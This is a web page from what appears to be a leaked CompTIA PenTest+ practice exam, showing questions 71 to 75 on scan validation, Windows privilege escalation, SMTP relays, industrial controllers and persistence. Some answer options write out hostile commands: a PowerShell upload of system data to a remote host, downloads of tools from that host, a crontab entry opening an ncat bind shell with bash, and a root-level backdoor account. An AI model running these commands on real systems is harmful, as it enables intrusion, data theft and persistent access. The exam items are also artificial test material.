Free Access CompTIA.PT0-002.v2022-07-29.q85 Practice Test (Page 16)

Question 71

A penetration tester completed a vulnerability scan against a web server and identified a single but severe vulnerability.
Which of the following is the BEST way to ensure this is a true positive?

A.Check the results on the scanner.

B.Perform a manual test on the server.

C.Run another scanner to compare.

D.Look for the vulnerability online.

Question 72

A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?

A.certutil -urlcache -split -f http://192.168.2.124/windows-binaries/ accesschk64.exe

B.powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/ upload.php', 'systeminfo.txt')

C.schtasks /query /fo LIST /v | find /I "Next Run Time:"

D.wget http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe

Question 73

In the process of active service enumeration, a penetration tester identifies an SMTP daemon running on one of the target company's servers. Which of the following actions would BEST enable the tester to perform phishing in a later stage of the assessment?

A.Test for RFC-defined protocol conformance.

B.Check for an open relay configuration.

C.Perform a reverse DNS query and match to the service banner.

D.Attempt to brute force authentication to the service.

Question 74

A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant.
The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?

A.Supervisory systems will detect a malicious injection of code/commands.

B.PLCs will not act upon commands injected over the network.

C.Supervisors and controllers are on a separate virtual network by default.

D.Controllers will not validate the origin of commands.

Question 75

A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop. Which of the following can be used to ensure the tester is able to maintain access to the system?

A.wmic startup get caption,command

B.sudo useradd -ou 0 -g 0 user

C.crontab -l; echo "@reboot sleep 200 && ncat -lvp 4242 -e /bin/bash") | crontab 2>/dev/null

D.schtasks /create /sc /ONSTART /tr C:\Temp\WindowsUpdate.exe

Other Version: 715CompTIA.PT0-002.v2025-07-15.q245; 1398CompTIA.PT0-002.v2024-06-12.q330; 1160CompTIA.PT0-002.v2023-02-20.q55; 1278CompTIA.PT0-002.v2022-04-29.q49; 1526CompTIA.PT0-002.v2022-04-23.q65; 95CompTIA.Trainingdump.PT0-002.v2021-12-19.by.barlow.38q.pdf

Latest Upload: 105OCEG.GRCP.v2025-09-11.q211; 104HP.HPE0-V27.v2025-09-11.q78; 118Oracle.1Z0-1057-23.v2025-09-10.q47; 150Google.Professional-Cloud-Network-Engineer.v2025-09-09.q179; 131SAP.C-S4EWM-2023.v2025-09-08.q83; 164TheSecOpsGroup.CNSP.v2025-09-08.q20; 223CFAInstitute.ESG-Investing.v2025-09-08.q173; 158PECB.ISO-IEC-27001-Lead-Implementer.v2025-09-06.q132; 148Salesforce.Data-Architect.v2025-09-05.q216; 144Adobe.AD0-E605.v2025-09-05.q50

Question 71

Question 72

Question 73

Question 74

Question 75

Download PDF File